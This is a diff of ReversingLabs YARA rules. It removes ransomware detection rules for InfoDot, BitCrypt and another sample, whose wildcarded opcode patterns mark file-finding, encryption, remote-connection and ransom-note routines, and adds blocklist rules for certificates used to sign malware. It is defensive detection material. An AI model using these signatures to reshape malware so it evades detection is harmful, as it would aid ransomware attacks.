-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ??
-            8D 4C 24 ?? 89 0C 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C
-            24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 4C 24 ?? 8D
-            44 24 ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ??
-            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? E8 ?? ??
-            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 89 44 24 ??
-            89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            81 C4 ?? ?? ?? ?? C3 E8
-        }
-		$encrypt_files_aes = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 44 24
-            ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24
-            ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 4C 24 ?? 8B 50 ??
-            89 0C 24 FF D2 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ??
-            89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24
-            ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 89
-            1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B
-            44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 54 24 ??
-            89 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24
-            ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ??
-            8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ??
-            89 2C 24 FF D3 8B 05 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44
-            24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89
-            4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 C4 ?? C3 E8
-        }
-		$encrypt_files_rsa = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24
-            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B
-            44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 50 ?? 8B 40 ?? 89 0C 24 89 54 24 ?? 89
-            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 75 ??
-            8D 15 ?? ?? ?? ?? 39 D0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 04
-            24 89 54 24 ?? 89 4C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24
-            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C
-            24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 83 C4 ?? C3 C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C
-            24 ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C7 40 ?? ??
-            ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8D 0D ?? ?? ?? ?? 89 08 C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? 89
-            44 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 04 24 8D 0D ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ?? ??
-            ?? 8B 44 24 ?? EB ?? 89 04 24 89 54 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ??
-            ?? 0F 0B
-        }
-		$find_files = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ??
-            ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44
-            24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ??
-            ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ??
-            ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 90 E8 ?? ?? ?? ?? 83
-            C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 E8
-        }
-		$remote_connection_p1 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24
-            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D
-            05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ??
-            8D 0D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C6 40 ?? ?? 8B 0D ?? ?? ?? ??
-            8B 54 24 ?? 8D 5A ?? 85 C9 0F 85 ?? ?? ?? ?? 89 42 ?? 8D 05 ?? ?? ?? ?? 89 04 24 E8
-            ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8D 0D
-            ?? ?? ?? ?? 89 08 8B 0D ?? ?? ?? ?? 8D 50 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 89
-            48 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B
-            44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44
-            24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ??
-            8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ??
-            ?? 8B 4C 24 ?? 89 08 C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40
-        }
-		$remote_connection_p2 = {
-            C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 4C 24
-            ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 4C
-            24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 05 ?? ?? ??
-            ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C
-            24 ?? 8B 54 24 ?? 89 0C 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24
-            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 0C
-            24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3
-            8B 48 ?? 84 01 8B 40 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 41 ?? 89 44 24 ?? E8 ??
-            ?? ?? ?? 85 C0 75 ?? EB ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8B 4C 24 ?? 89 4C
-            24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? E9 ?? ?? ?? ?? 89 14 24 8B 44 24 ?? 89 44 24 ?? E8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 90 E8
-            ?? ?? ?? ?? 83 C4 ?? C3 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( all of ( $remote_connection_p* ) ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79" or pe.signatures [ i ] . serial == "ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79" ) and 1527811200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Infodot : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_61Fe6F00Bd79684210534050Ff46Bc92 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects InfoDot ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2f6447f4-523b-5ea1-a16d-d68bb9bcc79d"
-		date = "2021-02-16"
-		modified = "2021-02-16"
+		id = "b88e0bbf-ab3a-51ac-8542-d4f92116f5e9"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.InfoDot.yara#L1-L115"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14242-L14258"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "24a1c25c1d70c21323417ae0892c613361c4bfc829737ef86b6fa7616ae668c6"
+		logic_hash = "e8ebc5de081e2d1e653493a2d85699ebfb5227b7fab656468025c2043903f597"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "InfoDot"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 8B D9 89 9D ?? ?? ?? ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 FF D3 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? EB
-            ?? 8D 49 ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75
-            ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50
-            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85
-            C0 74 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 85 D2 74
-            ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0
-            83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ?? 50 FF 15
-        }
-		$find_files_p2 = {
-            8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 56 50 FF D7 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 FF D3 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? F6 85 ?? ??
-            ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 56 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 50 FF D7 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9
-            EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51
-            8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? 99 83 C4 ?? 0B
-            C2 75 ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 83 CB ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? 8B CF 8D A4 24
-            ?? ?? ?? ?? 66 8B 31 66 3B 32 75 ?? 66 85 F6 74 ?? 66 8B 41 ?? 66 3B 42 ?? 75 ?? 83
-        }
-		$find_files_p3 = {
-            C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50
-            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85
-            C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ??
-            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
-            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ??
-            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 0F 66 3B 08 75 ?? 66 85 C9 74 ?? 66 8B 4F ?? 66 3B 48
-            ?? 75 ?? 83 C7 ?? 83 C0 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 85 DB 7F ?? 8B 95 ?? ?? ?? ?? 7C ?? 81
-        }
-		$find_files_p4 = {
-            FA ?? ?? ?? ?? 73 ?? 3B D8 0F 8F ?? ?? ?? ?? 7C ?? 3B D1 73 ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 EC ?? 8D 95 ?? ?? ?? ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 84 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 3B D8 7F
-            ?? 7C ?? 8B 85 ?? ?? ?? ?? 3B C1 73 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 3D ??
-            ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ??
-            ?? 85 C0 8B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D
-            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8B F1 C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 74 ?? 83 C8 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 56 8D 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 0F 57
-            C0 68 ?? ?? ?? ?? 50 F3 0F 7F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
-            ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
-            57 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B FF
-            81 FF ?? ?? ?? ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
-            50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75
-            ?? 8B C7 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 BE ?? ?? ?? ?? 2B F0 8D 85 ?? ?? ?? ??
-            56 03 C7 56 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F7 8D 85 ?? ??
-            ?? ?? 56 50 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 6A ?? 50 E8 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ??
-            83 C4 ?? 33 CD 33 C0 5F 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "61:fe:6f:00:bd:79:68:42:10:53:40:50:ff:46:bc:92" and 1512000000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Bitcrypt : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_0323Cc4E38735B0E6Efba76Ea25C73B7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BitCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f00a0fd8-31a9-5ee6-b560-09ccf6fe490b"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "0f3889d5-fb57-5745-999e-7dff0ddf7ee9"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BitCrypt.yara#L3-L112"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14260-L14276"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "66cfe16a182e7f20d6358be9569ada5e6c36c94d44781d8c741638e1b174d44e"
+		logic_hash = "48bda7f61c9705ae70add3940f10d65fc7f7a776cec91a244f0e5bde07303831"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BitCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$bc_bcdedit = {
-            55 8B EC 6A ?? 53 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3
-            E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
-            ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? C3
-        }
-		$bc_enum_drives_a_z = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 D2 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B F0 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 06 B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
